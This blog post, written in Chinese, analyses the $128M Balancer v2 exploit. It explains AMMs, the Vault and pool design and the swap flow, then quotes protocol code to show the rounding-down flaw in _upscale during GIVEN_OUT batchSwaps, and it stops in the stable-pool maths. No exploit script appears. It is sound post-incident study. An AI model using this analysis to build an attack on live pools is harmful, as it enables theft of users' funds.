Kiprey's Blog

Balancer 128M Exploit Analysis

2025-11-22T16:00:00.000Z

一、简介

2025年11月3日，攻击者利用 balancer 池不变式计算中的算术精度损失，在不到 30 分钟的时间内，从六个区块链网络中窃取了 1.28 亿美元。 我对这个攻击非常感兴趣，但是现有的网上的文章大多在描述极其有限的技术细节，例如 _upscaleArray 相关逻辑的精度丢失又或者是相邻一两层的调用链，对于尚未了解过 balancer 具体细节的读者不太友好。因此想好好整理一下全部相关细节并趁机学习一下 balancer 协议。

二、Balancer Internal

一句话：Balancer 是以 自动做市商（AMM） 为核心的一个 DeFi 流动性池框架。是不是感觉说了和没说没什么两样，别担心，我们一步步来理解。

1. 什么是 AMM

什么是自动做市商 AMM？我们先了解一下什么是做市商，做市商 Market Maker 是一个用于提供流动性的角色。例如在股票交易中，如果某个标的的买价 bid 和卖价 ask 之间相差巨大，那么这不利于用户进行买卖，因为差价较大会导致交易不到合适的价格进而造成额外的资金损失。而做市商就会通过在订单簿中高频挂单提供流动性，来减少买卖价格的差距。如果你玩过美股期权，那你就尤为能体会到这一点，因为期权的特殊性，其流动性会比较糟糕，因此大部分买卖池里的流动性都是做市商提供的。

而对于加密货币来说，货币转换也会遇到类似的问题。如果用户希望能大额买卖自己的代币，那么需要找到一个能吃下自己所有交易的地方。熟为人知的 Uniswap-V2 就是一个比较经典的地方，它这里持有了大量的 TokenA/TokenB 代币对，并且通过维持 x * y = k 不变量来计算代币兑换价格。例如假如 Uniswap 的 k = 20,000，且当前持有了 1000 USDC 和 20 ETH，则 ETH/USDC 兑换价格为 50。而如果 Uniswap 里持有的代币数量变成了 2000 USDC 和 10 ETH （注意k不变），则 ETH/USDC 兑换价格就变成了 200。你可以看到像 Uniswap 这种交易场所，其交易价格会随着数学公式的计算来自动变换，因此是自动的做市商。自动做市商就是既能自动根据市场情况来变幻价格，又能为用户提供充足的代币流动性来满足交易需求的一个角色。

2. Balancer 组件

Balancer-v2 文档里描述了 Balancer 主要由两部分组成：Vault 和 Pools。Vault 和 Pools 是一对多的关系，因此如果用户涉及到多个代币之间的交易操作，则只需要在 Vault 里变动记帐即可，减少重复的转账，降低 gas 费用。

Vault

Vault（pkg/vault/contracts/Vault.sol）是 Balancer 的核心，它持有和管理每个 Balancer 池中的所有代币，也是大多数 Balancer 操作（swaps / joins / exits）的入口。但是需要注意的是 Vault 持有代币和记账，但是它不进行具体的资金管理（例如维护 AMM 不变量等逻辑就不在 vault 里做），这部分逻辑则在 Pools 里进行。

Pools

Balancer 里有很多种不同类型的 pool，这里简单介绍几种比较简单或常用的：

Linear Pool：其使用已知且稳定的汇率，让基础资产与其包装后的收益代币进行兑换。例如，在 Aave 中，稳定币 DAI 与将其存入 Aave 后所获得的、代表存款并持续累积利息的 aDAI 之间，就可以通过 Linear Pool 实现高效互换。
Weight Pool: 对 Uniswap V1 所推广的经典恒定乘积做市模型（x · y = k）的扩展版本。
Composable Stable Pools: 面向一组价值高度相关、预期能以近 1:1 或通过已知汇率实现稳定兑换的资产所设计的流动性池。例如 USDC、USDT、DAI 等稳定币之间的交易，它们的价格波动极小，因此非常适合用低滑点的稳定性曲线进行撮合。

对于 Composable Stable Pools，需要注意的是：

这类场景与 Linear Pool 的目标并不同：Composable Stable Pool 处理的是“多个相互等价的稳定资产”之间的兑换，而 Linear Pool 处理的是“基础资产与其收益代币”之间的兑换，两者的数学结构和应用场景均有显著差异。
Composable 表示该池的 BPT（Balancer Pool Token，即流动性提供者在向池中存入资产后所收到的 ERC20 份额证明）本身可以作为一种可组合的资产参与其它池子的构建，也就是说池子的 LP 代币能够像普通代币一样被继续嵌套进更高层级的池，从而使不同池子之间能够自由组合、互相引用，并共同形成更大规模、更高资本效率的流动性结构。虽然 Linear Pool 也会将自身的 BPT 注册到 Vault 中，但这些 BPT 可能并不会被当作可组合资产用于构建其他 Pool。

3. Balancer 交互流程

这里我们以 Vault + Composable Stable Pools 组合为例来介绍一下 Balancer 的一些交互流程。

创建 Composable Stable Pools 合约

我们先来看看当创建一个 pool 时，vault 和 pool 之间会有什么样的交互流程以及涉及到的状态变量：

若想创建一个新的 Composable Stable Pool 时，用户可以自由调用 ComposableStablePoolFactory (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol) 合约的 create 函数来创建出新的 ComposableStablePool 合约。

ComposableStablePool 的 constructor 接下来则会自动调用 vault.registerPool 和 vault.registerTokens 将本 pool 以及相关 token 注册进 vault 中。需要注意的是这里的相关 token 除了注册时指定的底层资产以外，还会包含 pool 地址本身（因为 pool 本身就是它自己的 BPT）。

// pkg/pool-stable/contracts/ComposableStablePool.sol
constructor(NewPoolParams memory params)
    BasePool(
        params.vault,
        IVault.PoolSpecialization.GENERAL,
        params.name,
        params.symbol,
        _insertSorted(params.tokens, IERC20(this)), // <------
        new address[](params.tokens.length + 1), // <------
        params.swapFeePercentage,
        params.pauseWindowDuration,
        params.bufferPeriodDuration,
        params.owner
    )
    StablePoolAmplification(params.amplificationParameter)
    ComposableStablePoolStorage(_extractStorageParams(params))
    ComposableStablePoolRates(_extractRatesParams(params))
    ProtocolFeeCache(
        params.protocolFeeProvider,
        ProviderFeeIDs({ swap: ProtocolFeeType.SWAP, yield: ProtocolFeeType.YIELD, aum: ProtocolFeeType.AUM })
    )
{
    _version = params.version;
}

// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol
function _registerPool(
    IVault vault,
    IVault.PoolSpecialization specialization,
    IERC20[] memory tokens,
    address[] memory assetManagers
) private returns (bytes32) {
    bytes32 poolId = vault.registerPool(specialization);

    // We don't need to check that tokens and assetManagers have the same length, since the Vault already performs
    // that check.
    vault.registerTokens(poolId, tokens, assetManagers);

    return poolId;
}

这里提一嘴这个 PoolSpecialization，它决定了 Vault 在调用 pool 进行 swap 时所采用的 callback 接口形式，从而影响池子的 gas 成本与可支持的功能范围：

General 类型最灵活，适用于需要访问全部 token 余额和复杂数学逻辑的池。
Minimal Swap Info 则在保证功能性的同时减少回调数据量，常用于 Weight Pool 这类不需要全面状态的 AMM。
Two Token 则进一步将池子限制为仅包含两个资产，以换取最低的 swap gas 成本。

不同类型的池根据自身 invariant 的计算需求和预期的 swap 复杂度，会选择适合的 specialization 来平衡功能与性能。每个 pool 在 constructor 时就会写死 PoolSpecialization 参数，在 ComposableStablePool 中 PoolSpecialization 就被设置为 GENERAL。

Vault 这边在收到 General Pool 的函数调用时会做一些计算和状态更新。一个是在 registerPool 函数中 vault 会为这个 pool 计算一个独一无二的 pool ID 并存入 _isPoolRegistered 变量中：

// pkg/vault/contracts/PoolRegistry.sol
function registerPool(PoolSpecialization specialization)
    external
    override
    nonReentrant
    whenNotPaused
    returns (bytes32)
{
    // Each Pool is assigned a unique ID based on an incrementing nonce. This assumes there will never be more than
    // 2**80 Pools, and the nonce will not overflow.

    bytes32 poolId = _toPoolId(msg.sender, specialization, uint80(_nextPoolNonce));

    _require(!_isPoolRegistered[poolId], Errors.INVALID_POOL_ID); // Should never happen as Pool IDs are unique.
    _isPoolRegistered[poolId] = true;

    _nextPoolNonce += 1;

    // Note that msg.sender is the pool's contract
    emit PoolRegistered(poolId, msg.sender, specialization);
    return poolId;
}

另一个是在 registerTokens 函数中分别设置 _poolAssetManagers 和 _generalPoolsBalances。这俩函数都是用来作为 key 去存数据，前者表示能够操纵 Pool 内某 token 的存入/提取/设置余额的管理员地址，后者表示 Pool 内某 token 在 vault 这边的余额状态。因此可以在这里看到确实是 vault 来保存 Pool 里存放的各个 token 的数量情况，这也便于 swap 交换。

// pkg/vault/contracts/PoolTokens.sol
function registerTokens(
    bytes32 poolId,
    IERC20[] memory tokens,
    address[] memory assetManagers
) external override nonReentrant whenNotPaused onlyPool(poolId) {
    InputHelpers.ensureInputLengthMatch(tokens.length, assetManagers.length);

    // Validates token addresses and assigns Asset Managers
    for (uint256 i = 0; i < tokens.length; ++i) {
        IERC20 token = tokens[i];
        _require(token != IERC20(0), Errors.INVALID_TOKEN);

        _poolAssetManagers[poolId][token] = assetManagers[i];
    }

    PoolSpecialization specialization = _getPoolSpecialization(poolId);
    if (specialization == PoolSpecialization.TWO_TOKEN) {
        _require(tokens.length == 2, Errors.TOKENS_LENGTH_MUST_BE_2);
        _registerTwoTokenPoolTokens(poolId, tokens[0], tokens[1]);
    } else if (specialization == PoolSpecialization.MINIMAL_SWAP_INFO) {
        _registerMinimalSwapInfoPoolTokens(poolId, tokens);
    } else {
        // PoolSpecialization.GENERAL
        _registerGeneralPoolTokens(poolId, tokens); // <-------
    }

    emit TokensRegistered(poolId, tokens, assetManagers);
}

// pkg/vault/contracts/balances/GeneralPoolsBalance.sol
function _registerGeneralPoolTokens(bytes32 poolId, IERC20[] memory tokens) internal {
    EnumerableMap.IERC20ToBytes32Map storage poolBalances = _generalPoolsBalances[poolId];

    for (uint256 i = 0; i < tokens.length; ++i) {
        // EnumerableMaps require an explicit initial value when creating a key-value pair: we use zero, the same
        // value that is found in uninitialized storage, which corresponds to an empty balance.
        bool added = poolBalances.set(tokens[i], 0);
        _require(added, Errors.TOKEN_ALREADY_REGISTERED);
    }
}

说到这里就不得不提 Pool Balances 在 vault 里的数据保存形式。_generalPoolsBalances 里为每个 pool 在某个 token 上保存的余额信息是以 bytes32 来表示，其中包含了三个字段：

cash 112bits，表示该 Pool 当前存放在 Vault 内的代币数量
managed 112bits，表示由 Pool 的 Asset Manager 从 Vault 中提走并在外部托管的代币数量
lastChangeBlock 32bits，表示上一次余额变动时的区块号，防止三明治攻击用的

这个设计的核心目的是在保持 AMM 正常运作的同时，让流动性能够获得更高的收益。在早期的 Uniswap 模型中，为了维持 x·y = k，不得不把绝大部分流动性都锁在合约内部，从而无法进行任何外部投资，也就不能产生额外收益。而 Balancer 的架构允许通过 Asset Manager 将部分资金从 Vault 中划出，用于借贷、投资或执行其他收益策略。这样 Pool 的总余额依然等于 total = cash + managed，但其中的 managed 部分能够被灵活利用来赚取额外收益；只有当发生 swap、join 或 exit 等事件时，才会更新存放在 Vault 内的 cash 数量。这样既保证了 AMM 的可用性，又提高了整体资金效率。

注入流动性

当 Liquidity Provider (LP) 想为 Pool 添加流动性时，LP 可以通过调用 vault 上的 joinPool 函数来注资。vault.joinPool 函数会调用具体的 pool 的 onJoinPool 函数（退出流动性则分别调用 vault.exitPool 和 pool.onExitPool 函数）。以下是 onJoinPool / onExitPool 函数的代码，可以看出来这俩是会被所有类型的 Pool 给继承，具体不同类型的 Pool 则分别实现不同的 _onInitializePool / _onJoinPool / _onExitPool 此类 hook 函数来计算资金流入流出的数额，但 BPT 的铸造和销毁是在这里：

// pkg/pool-utils/contracts/BasePool.sol
/**
 * @notice Vault hook for adding liquidity to a pool (including the first time, "initializing" the pool).
 * @dev This function can only be called from the Vault, from `joinPool`.
 */
function onJoinPool(
    bytes32 poolId,
    address sender,
    address recipient,
    uint256[] memory balances,
    uint256 lastChangeBlock,
    uint256 protocolSwapFeePercentage,
    bytes memory userData
) external override onlyVault(poolId) returns (uint256[] memory, uint256[] memory) {
    _beforeSwapJoinExit();

    uint256[] memory scalingFactors = _scalingFactors();

    if (totalSupply() == 0) {
        (uint256 bptAmountOut, uint256[] memory amountsIn) = _onInitializePool(
            poolId,
            sender,
            recipient,
            scalingFactors,
            userData
        );

        // On initialization, we lock _getMinimumBpt() by minting it for the zero address. This BPT acts as a
        // minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the
        // Pool from ever being fully drained.
        _require(bptAmountOut >= _getMinimumBpt(), Errors.MINIMUM_BPT);
        _mintPoolTokens(address(0), _getMinimumBpt());
        _mintPoolTokens(recipient, bptAmountOut - _getMinimumBpt());

        // amountsIn are amounts entering the Pool, so we round up.
        _downscaleUpArray(amountsIn, scalingFactors);

        return (amountsIn, new uint256[](balances.length));
    } else {
        _upscaleArray(balances, scalingFactors);
        (uint256 bptAmountOut, uint256[] memory amountsIn) = _onJoinPool(
            poolId,
            sender,
            recipient,
            balances,
            lastChangeBlock,
            inRecoveryMode() ? 0 : protocolSwapFeePercentage, // Protocol fees are disabled while in recovery mode
            scalingFactors,
            userData
        );

        // Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.

        _mintPoolTokens(recipient, bptAmountOut);

        // amountsIn are amounts entering the Pool, so we round up.
        _downscaleUpArray(amountsIn, scalingFactors);

        // This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.
        return (amountsIn, new uint256[](balances.length));
    }
}

/**
 * @notice Vault hook for removing liquidity from a pool.
 * @dev This function can only be called from the Vault, from `exitPool`.
 */
function onExitPool(
    bytes32 poolId,
    address sender,
    address recipient,
    uint256[] memory balances,
    uint256 lastChangeBlock,
    uint256 protocolSwapFeePercentage,
    bytes memory userData
) external override onlyVault(poolId) returns (uint256[] memory, uint256[] memory) {
    uint256[] memory amountsOut;
    uint256 bptAmountIn;

    // When a user calls `exitPool`, this is the first point of entry from the Vault.
    // We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit
    // mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally
    // should always work, even if the Pool's mathematics or a dependency break down.
    if (userData.isRecoveryModeExitKind()) {
        // This exit kind is only available in Recovery Mode.
        _ensureInRecoveryMode();

        // Note that we don't upscale balances nor downscale amountsOut - we don't care about scaling factors during
        // a recovery mode exit.
        (bptAmountIn, amountsOut) = _doRecoveryModeExit(balances, totalSupply(), userData);
    } else {
        // Note that we only call this if we're not in a recovery mode exit.
        _beforeSwapJoinExit();

        uint256[] memory scalingFactors = _scalingFactors();
        _upscaleArray(balances, scalingFactors);

        (bptAmountIn, amountsOut) = _onExitPool(
            poolId,
            sender,
            recipient,
            balances,
            lastChangeBlock,
            inRecoveryMode() ? 0 : protocolSwapFeePercentage, // Protocol fees are disabled while in recovery mode
            scalingFactors,
            userData
        );

        // amountsOut are amounts exiting the Pool, so we round down.
        _downscaleDownArray(amountsOut, scalingFactors);
    }

    // Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.

    _burnPoolTokens(sender, bptAmountIn);

    // This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.
    return (amountsOut, new uint256[](balances.length));
}

Swap 操作

在 Balancer 中，用户可以通过 swap 与 batchSwap 与 Vault 进行代币交换，而无需直接信任 Pool 合约本身，因为所有安全检查均由 Vault 完成。swap 用于执行一次单独的代币兑换，batchSwap 则可在同一笔交易中按顺序执行多次兑换，并支持 multihop 形式的链式交换。

每次 swap 都包含一个 tokenIn 与一个 tokenOut：前者由用户发送给 Pool，后者由 Pool 发给接收方。根据用户的意图不同，swap 分为两类：

GIVEN_IN：输入数量固定，由 Pool 通过 onSwap 钩子计算输出数量
GIVEN_OUT：输出数量固定，也是由 Pool 通过 onSwap 钩子计算输出数量

注意：在 batchSwap 里，虽然会涉及到多个 swap 操作，但是这些 swap 操作都共用一种类型，即要么这些 swap 全是 GIVEN_IN 类型，要么全是 GIVEN_OUT 类型。这个 SwapKind 是用户在调用 batchSwap 通过函数调用参数指定的，因此不会出现一笔 batchSwap 里不同 swap 的 Kind 混着计算的情况。

无论进行多少次交换，Vault 都会先完成所有中间计算，并在最后一步一次性结算代币的净变动，从而显著节省 gas，尤其是在 multihop 或跨多个 Pool 交换时。

在 multihop 进行多次代币转换时（例如先 TokenA/TokenB swap，再 TokenB/TokenC 转换），可以在后续 swap 时设置 tokenIn amount 为 0，这将使用上一步 swap 所流出的 token 数量，以简化计算逻辑，也就是不需要用户去算每一次 swap 的数量。

注意：用户有义务根据 SwapKind 来维护正确的 Swap 顺序。例如，假设有 TokenA/TokenB 和 TokenB/TokenC 两对 swap，如果用户希望

用 100 TokenA 来 swap 出 TokenC，则需设置
- SwapKind 为 GIVEN_IN
- SwapSteps 为 100 TokenA/TokenB -> 0 TokenB/TokenC。表示将 100 Token A 用于兑换 TokenB，并将全部兑换到的 TokenB 用来兑换 TokenC （第二步 TokenB/TokenC 的 swap 操作 amount 被设置为 0 以表示使用上一步的兑换结果数额）。
需要用 TokenA 来 swap 出 100 TokenC，则需要设置
- SwapKind 为 GIVEN_OUT
- SwapSteps 为 100 TokenB/TokenC -> 0 TokenA/TokenB。表示倒推如果需要 100 个 TokenC，则需要提供多少个 TokenB，然后把所计算出所需的 TokenB 的数量再用于倒推需要提供多少个 TokenA。

由于 batchSwap 需要支持两种 swap，因此 pool 需要分别为这两种方向的 swap 实现有利于协议的份额计算方式，其函数调用路径为：batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → 具体各个 pool 所实现的 _swapGivenIn/_swapGivenOut hook 函数。其中 BaseGeneralPool._swapGivenIn/_swapGivenOut 这俩函数是可以被 override 的，ComposableStablePool 就是把这俩 _swapGivenIn/_swapGivenOut 函数给 override 掉用来单独特判 BPT 的 swap 逻辑。

提一嘴，对于 ComposableStablePool 这种 GeneralPool 来说，vault 在处理 swap 时所操作的 pool 余额就是我们之前已经介绍过的 _generalPoolsBalances 状态变量，可以从这里快速看出它是怎么记账的：

// pkg/vault/contracts/Swaps.sol
function _processGeneralPoolSwapRequest(IPoolSwapStructs.SwapRequest memory request, IGeneralPool pool)
    private
    returns (uint256 amountCalculated)
{
    bytes32 tokenInBalance;
    bytes32 tokenOutBalance;

    // We access both token indexes without checking existence, because we will do it manually immediately after.
    EnumerableMap.IERC20ToBytes32Map storage poolBalances = _generalPoolsBalances[request.poolId];
    uint256 indexIn = poolBalances.unchecked_indexOf(request.tokenIn);
    uint256 indexOut = poolBalances.unchecked_indexOf(request.tokenOut);

    if (indexIn == 0 || indexOut == 0) {
        // The tokens might not be registered because the Pool itself is not registered. We check this to provide a
        // more accurate revert reason.
        _ensureRegisteredPool(request.poolId);
        _revert(Errors.TOKEN_NOT_REGISTERED);
    }

    // EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,
    // we can undo this.
    indexIn -= 1;
    indexOut -= 1;

    uint256 tokenAmount = poolBalances.length();
    uint256[] memory currentBalances = new uint256[](tokenAmount);

    request.lastChangeBlock = 0;
    for (uint256 i = 0; i < tokenAmount; i++) {
        // Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we
        // know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.
        bytes32 balance = poolBalances.unchecked_valueAt(i);

        currentBalances[i] = balance.total();
        request.lastChangeBlock = Math.max(request.lastChangeBlock, balance.lastChangeBlock());

        if (i == indexIn) {
            tokenInBalance = balance;
        } else if (i == indexOut) {
            tokenOutBalance = balance;
        }
    }

    // Perform the swap request callback and compute the new balances for 'token in' and 'token out' after the swap
    amountCalculated = pool.onSwap(request, currentBalances, indexIn, indexOut);
    (uint256 amountIn, uint256 amountOut) = _getAmounts(request.kind, request.amount, amountCalculated);
    tokenInBalance = tokenInBalance.increaseCash(amountIn);
    tokenOutBalance = tokenOutBalance.decreaseCash(amountOut);

    // Because no tokens were registered or deregistered between now or when we retrieved the indexes for
    // 'token in' and 'token out', we can use `unchecked_setAt` to save storage reads.
    poolBalances.unchecked_setAt(indexIn, tokenInBalance);
    poolBalances.unchecked_setAt(indexOut, tokenOutBalance);
}

三、漏洞分析

我们来看一下这个漏洞是怎么触发的。首先我们需要 clone balancer/balancer-v2-monorepo 的仓库，并 checkout commit 为 88842344fb5f44d8ed6f8f944acd3be80627df87。

注意 balancer 的最新版本为 v3，因此 github 里还有一个 v3 的仓库，但漏洞出现的地方是在 v2 版本，不要弄错。以及此 commit 为截至 2025/11/20 的最新 commit，在攻击事件发生两周之后漏洞补丁仍然没有被 push 上来。

1. 漏洞代码

上一节里我们详细描述了 balancer 的交互流程，对一些操作和变量已经有了比较清晰的认知，因此理解起来这个漏洞就不再困难。这个漏洞其实很简单，当用户指定 SwapKind.GIVEN_OUT 调用 vault.batchSwap 时，如果 swap 涉及到 ComposableStablePool 且 tokenIn/tokenOut 不为 BPT，则实际会调用基类 BaseGeneralPool._swapGivenOut 来计算所需 tokenIn 的数额：

// pkg/pool-stable/contracts/ComposableStablePool.sol
/**
 * @dev Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,
 * or a swap involving BPT, which is equivalent to a single token join or exit. Since one of the Pool's
 * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.
 *
 * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they
 * refer to the full set of registered tokens (including BPT).
 *
 * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage
 * and charges protocol fees, in the same manner as single token join/exits. Otherwise, perform the default
 * processing for a regular swap.
 */
function _swapGivenOut(
    SwapRequest memory swapRequest,
    uint256[] memory registeredBalances,
    uint256 registeredIndexIn,
    uint256 registeredIndexOut,
    uint256[] memory scalingFactors
) internal virtual override returns (uint256) {
    return
        (swapRequest.tokenIn == IERC20(this) || swapRequest.tokenOut == IERC20(this))
            ? _swapWithBpt(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)
            : super._swapGivenOut( // <------ [1]
                swapRequest,
                registeredBalances,
                registeredIndexIn,
                registeredIndexOut,
                scalingFactors
            );
}

// pkg/pool-utils/contracts/BaseGeneralPool.sol
function _swapGivenOut(
    SwapRequest memory swapRequest,
    uint256[] memory balances,
    uint256 indexIn,
    uint256 indexOut,
    uint256[] memory scalingFactors
) internal virtual returns (uint256) {
    _upscaleArray(balances, scalingFactors);
    swapRequest.amount = _upscale(swapRequest.amount, scalingFactors[indexOut]); // <---- [2]

    uint256 amountIn = _onSwapGivenOut(swapRequest, balances, indexIn, indexOut);

    // amountIn tokens are entering the Pool, so we round up.
    amountIn = _downscaleUp(amountIn, scalingFactors[indexIn]);

    // Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.
    return _addSwapFeeAmount(amountIn);
}

// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol
/**
 * @dev Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed
 * scaling or not.
 */
function _upscale(uint256 amount, uint256 scalingFactor) pure returns (uint256) {
    // Upscale rounding wouldn't necessarily always go in the same direction: in a swap for example the balance of
    // token in should be rounded up, and that of token out rounded down. This is the only place where we round in
    // the same direction for all amounts, as the impact of this rounding is expected to be minimal.
    return FixedPoint.mulDown(amount, scalingFactor); // <----- [3]
}

从代码中可以看到，哪怕是为 GivenOut 计算所需 tokenIn 的 amount ，BaseGeneralPool._swapGivenOut 依然会用 mulDown 来进行 upscale。然而在 GivenOut 的上下文下，mulDown 是偏向于用户而非偏向于协议的，因为 swapRequest.amount 此时表示用户需要多少个 tokenOut，如果 _upscale 计算出来的 token 价值被设置少了，那么可能就无法确保用户支付的价值足够多。

例如对于 TokenB/TokenC swap 此时 amount =100 表示用户需要100个 tokenC，以此来计算 pool 需要用户提供多少个 TokenB，如果 amount 被减小了，那么自然计算出来的需要从用户那边转账进 vault 的 tokenA 的数量就会跟着变小。

这里就是漏洞的实际关键代码。 不过从注释里看出开发者确信这里能造成的影响微乎其微（the impact of this rounding is expected to be minimal），那是什么导致本应该微乎其微的影响竟能产生如此大的代币窃取呢？这里需要仔细分析几个关键点。首先我们来捋一捋 scalingFactor 的计算过程。

在 ComposableStablePool 中，所计算的 scalingFactor 将会等于该 token 当前 decimal 乘以 token rate，这将导致最终计算出来的结果将为在 1e18 精度下的小数，并在 _upscale 中的 FixedPoint.mulDown 里最后一步将 1e18 精度除掉。

例如，假如 _scalingFactor0 为 1e18，tokenRate0 为 1.1e18，那么 _scalingFactors 函数计算出来的结果将为 1.1e18。
接下来以极小值作为 amount 参数调用 _upscale 函数，例如执行 _upscale(9, 1.1e18) ，则最终计算出来的结果将为 9.9e18 % 1e18 = 9，可以看到这里的计算丢失了 0.9 的精度，相当于是 10% 的精度损失。

// pkg/pool-stable/contracts/ComposableStablePoolRates.sol
/**
 * @dev Overrides scaling factor getter to compute the tokens' rates.
 */
function _scalingFactors() internal view virtual override returns (uint256[] memory) {
    // There is no need to check the arrays length since both are based on `_getTotalTokens`
    uint256 totalTokens = _getTotalTokens();
    uint256[] memory scalingFactors = new uint256[](totalTokens);

    for (uint256 i = 0; i < totalTokens; ++i) {
        scalingFactors[i] = _getScalingFactor(i).mulDown(_getTokenRate(i)); // <---
    }

    return scalingFactors;
}

但只分析到这并不够，攻击事件的核心问题并不在这。首先虽然 _upscale 的 amount 参数为 9 这种极小值时确实可以看到明显的精度丢失，但 9 这个极小值的逻辑意义就是 9 wei。要是攻击者进行一次 swap 就只窃取 1 wei 走，那这点钱可不够支付单次 swap 的 gas 费，这可能也正是 _upscale 开发者确信影响微乎其微的原因。其次，_scalingFactors 计算过程中乘以 tokenRate 的逻辑也没有问题，因为 Linear Pool 里有类似的逻辑，但 Linear Pool 却不在本次攻击范围内：

// pkg/pool-linear/contracts/LinearPool.sol
function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {
    if (token == _mainToken) {
        return _scalingFactorMainToken;
    } else if (token == _wrappedToken) {
        // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token
        // increases in value.
        return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate()); // <--------
    } else if (token == this) {
        return FixedPoint.ONE;
    } else {
        _revert(Errors.INVALID_TOKEN);
    }
}

那问题出在哪？？？是时候来学习一下 Stable Pool 的数学模型了。

2. Stable Pool 数学模型

这一节介绍一下 Stable Pool 的数学模型，出于学习的目的会涉及到额外的背景知识，并非所有内容都和漏洞有关。

在 swap 过程中控制流将通过调用链 BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap 进入到具体的 swap 份额计算逻辑：

/**
 * @dev Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so
 * all we need to do here is calculate the price quote, depending on the direction of the swap.
 */
function _onRegularSwap(
    bool isGivenIn,
    uint256 amountGiven,
    uint256[] memory registeredBalances,
    uint256 registeredIndexIn,
    uint256 registeredIndexOut
) private view returns (uint256) {
    // Adjust indices and balances for BPT token
    uint256[] memory balances = _dropBptItem(registeredBalances);
    uint256 indexIn = _skipBptIndex(registeredIndexIn);
    uint256 indexOut = _skipBptIndex(registeredIndexOut);

    (uint256 currentAmp, ) = _getAmplificationParameter();
    uint256 invariant = StableMath._calculateInvariant(currentAmp, balances);

    if (isGivenIn) {
        return StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);
    } else {
        return StableMath._calcInGivenOut(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);
    }
}

在这里我们可以看到几个用于计算份额的函数：

_getAmplificationParameter：获取放大系数，这是一个超参，可被管理员通过时间来平滑修改
_calculateInvariant：计算不变量 D
_calcOutGivenIn/_calcInGivenOut：根据之前计算出来的不变量 D 以及代币兑换方向来计算出 amountGiven 个 tokenIn 下能兑换出多少个 tokenOut

对于自动做市商 AMM 而言，它们大体上都需要遵守数学公式 $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$，以确保代币兑换价格能够随着交易自动变动。

其中 $\mathbf{B} = (B_1, B_2,…)$ 表示多个 token 的余额（注意这里的余额是乘以 Token Rate 之后的值），$\boldsymbol{\theta}=(\theta_1,\theta_2,…)$表示超参（上面的 AmplificationParameter 就属于超参），$D$即公式的不变量，代币余额变动是通过不变量来维持价格稳定。

不同代币对的价格行为和风险特征并不相同，因此不变量函数 f 也需要因市场结构而异。对于 Stable Pool 而言，由于稳定币的兑换关系通常长期维持在固定比例，例如 1:1，自然希望该池在这一价格临界点附近拥有尽可能大的流动性深度，使得即便存在较大规模的成交，也不会引起显著价格波动，从而降低滑点并提升交易体验。但与此同时，当价格明显偏离这一固定比例时，又必须保证价格具备足够的敏感性，使得继续交易的成本迅速上升，以防止某一侧资产被过度抽干，并为套利者提供恢复价格锚定的动力。大概是这种效果：

价格-流动性图：可以看到价格在 1.0 附近的流动性非常多，因为 stable coin 本身价格的变动就极其轻微；而偏远价格的流动性相对较低。
TokenA流动性-TokenB流动性图 (50/50 Stable Pool)：大概是途中橙线的效果，在0.5附近的样子接近常和线，在极端情况下的样子接近常积线。
图是用 chatgpt 画出来的，因此此图就是大概让读者看个样子有个预期印象，不能深究数学公式。

因此，Stable Pool 所采用的不变量函数并非单纯的常和模型或常积模型，而是通过引入放大系数等超参数，在二者之间实现连续过渡：

在价格接近锚定区间时，其行为更接近常和曲线 x + y = k，从而提供近乎稳定的兑换比率
随着价格逐渐偏离该区间，不变量函数又逐步向常积曲线 x * y = k 退化，使价格曲线变得更加陡峭，强化系统在极端情况下的安全性与稳健性

_calculateInvariant 函数里维持了这样的不变量公式，其中：

$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,; P = \prod_{i=1}^{n} x_i $$

A：放大系数，超参。
n：代币总个数。
S：全部代币总余额之和。
P：全部代币总余额之积。
D：上面提到的在代币 swap 时需要维持的不变量，待计算的值。

注：这里的数学公式与漏洞利用无关，不感兴趣的读者可以跳过。

这样一来，如果：

池子接近平衡状态：例如所有余额满足 $x_i \approx \frac{D}{n}$ 时，有$P \approx \left(\frac{D}{n}\right)^n$，此时方程中由 A 放大的项占主导，解趋近于$D \approx S$，从而得到 $x_1 + x_2 + \cdots + x_n \approx D$。这表明在锚定价格附近，池子的行为接近常和模型，价格曲线几乎线性，滑点极小，对应高流动性与价格稳定区域。
某个代币余额趋近于零：例如 $x_k \to 0$，则有 $P = \prod_{i=1}^{n} x_i \to 0$，此时项$\frac{D^{n+1}}{n^{n} P}$变得极大并主导整个等式，使其近似满足$D^{n+1} \propto P$，从而在边界区域退化为类似常积模型的行为，价格随交易量急剧变化，滑点迅速增大，有效阻止单一资产被完全抽空。

